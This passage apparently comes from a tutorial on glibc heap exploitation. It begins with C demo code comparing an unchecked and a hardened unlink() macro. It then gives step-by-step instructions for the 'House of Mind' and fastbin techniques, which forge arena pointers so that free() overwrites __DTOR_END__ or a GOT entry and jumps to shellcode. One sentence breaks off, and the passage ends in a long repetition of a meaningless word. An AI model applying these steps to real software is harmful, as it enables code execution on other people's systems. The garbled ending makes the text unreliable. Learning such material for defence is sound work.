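bool   chunk_non_main_arena(size_t size) { return (size & NON_MAIN_ARENA) != 0; }

/* Old unlink(): trusts fd/bk blindly. "fd->bk = bk" is the arbitrary write
 * the unlink technique above is built on. */
void unlink_unchecked(chunk_t *p)
{
    chunk_t *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Hardened unlink(): before writing anything, require that both neighbours
 * point back at p. A forged fd/bk pair fails this check; glibc aborts with
 * "corrupted double-linked list", here we return false instead. */
bool unlink_checked(chunk_t *p)
{
    chunk_t *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return false;
    fd->bk = bk;
    bk->fd = fd;
    return true;
}

/* A legitimate bin a <-> b <-> c: removing b must be accepted and leave a <-> c. */
bool demo_legit_unlink(void)
{
    chunk_t a = {0}, b = {0}, c = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    return unlink_checked(&b) && a.fd == &c && c.bk == &a;
}

/* The forged chunk from the text: bk = "shellcode", fd = "target - 12".
 * With the old macro, target.bk receives the forged bk pointer. */
bool demo_forged_unlink_writes(void)
{
    chunk_t target = {0}, fake_bk = {0}, b = {0};
    b.fd = &target;
    b.bk = &fake_bk;
    unlink_unchecked(&b);
    return target.bk == &fake_bk;   /* true: the overwrite happened */
}

/* Same forged chunk against the hardened macro: rejected, nothing written. */
bool demo_forged_unlink_rejected(void)
{
    chunk_t target = {0}, fake_bk = {0}, b = {0};
    b.fd = &target;
    b.bk = &fake_bk;
    bool accepted = unlink_checked(&b);
    return !accepted && target.bk == NULL;
}

int main(void)
{
    printf("size 0x21: chunk size 0x%zx, PREV_INUSE=%d\n", chunk_size(0x21), prev_inuse(0x21));
    printf("fake size 0xfffffffc (-4): PREV_INUSE=%d\n", prev_inuse(0xfffffffc));
    printf("old unlink wrote:      %d\n", demo_forged_unlink_writes());
    printf("hardened unlink wrote: %d\n", !demo_forged_unlink_rejected());
    return 0;
}
```

The flag helpers also explain the "-4" trick in the basic section: 0xfffffffc has PREV_INUSE clear, so a size field with that value claims that the previous chunk is free. The checked macro is why that whole chain no longer works: the forged `fd`/`bk` values are never consistent with a real bin, so the write is refused before it happens.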
The house of mind
Only one call to free() is needed to cause arbitrary code execution. We are looking for a second chunk that can be overflowed by a previous one and freed.
A call to free() causes a call to public_fREe(mem), which does:
mstate ar_ptr;
mchunkptr p;
…
p = mem2chunk(mem); —> Returns a pointer to the address where the chunk begins (mem-8)
…
ar_ptr = arena_for_chunk(p); —> chunk_non_main_arena(ptr)?heap_for_ptr(ptr)->ar_ptr:&main_arena [1]
…
_int_free(ar_ptr, mem);
}
In [1] it checks the NON_MAIN_ARENA bit of the size field, which can be altered so that the check returns true and executes heap_for_ptr(), which ands "mem" leaving the 2.5 least significant bytes at 0 (in our case 0x0804a000 becomes 0x08000000) and accesses 0x08000000->ar_ptr (as if it were a struct heap_info)
In this way, if we can control a chunk at, for example, 0x0804a000 and a chunk at 0x081002a0 is going to be freed, we can reach address 0x08100000 and write whatever we want there, for example 0x0804a000. When this second chunk is freed, heap_for_ptr(ptr)->ar_ptr will return what we wrote at 0x08100000 (because the and we saw before is applied to 0x081002a0 and the value of its first 4 bytes, the ar_ptr, is taken from there)
In this way _int_free(ar_ptr, mem) is called, i.e. _int_free(0x0804a000, 0x081002a0)
_int_free(mstate av, Void_t* mem){
…
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;
..}
As we saw before, we can control the value of av, since it is what we write in the chunk that is going to be freed.
From the way unsorted_chunks is defined, we know that:
bck = &av->bins[2]-8;
fwd = bck->fd = *(av->bins[2]);
fwd->bk = *(av->bins[2] + 12) = p;
Therefore, if we write the value of __DTOR_END__-12 in av->bins[2], the last instruction will write the address of the second chunk into __DTOR_END__.
That is, at the start of the first chunk we have to put the address of __DTOR_END__-12 many times, because av->bins[2] will take it from there.
At the address obtained by zeroing the last 5 hex digits of the second chunk's address, we have to write the address of this first chunk so that heap_for_ptr() thinks the ar_ptr is at the start of the first chunk and takes av->bins[2] from there.
In the second chunk, thanks to the first, we overwrite prev_size with a jump 0x0c and size with something that enables -> NON_MAIN_ARENA
Next, in chunk 2 we put a lot of nops and finally the shellcode.
In this way _int_free(CHUNK1, CHUNK2) will be called and it will follow the instructions to write into __DTOR_END__ the address of CHUNK2's prev_size, which will jump to the shellcode.
To apply this technique it is necessary
Fastbin
It is a variant of The House of Mind. In this case we are interested in the following code in _int_free():
fb = &(av->fastbins[fastbin_index(size)]); —> fastbin_index(sz) —> (sz >> 3) - 2
…
p->fd = *fb
*fb = p
In this way, if fb ends up pointing at a GOT entry, the address of the chunk being freed (p) is written there.
vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhla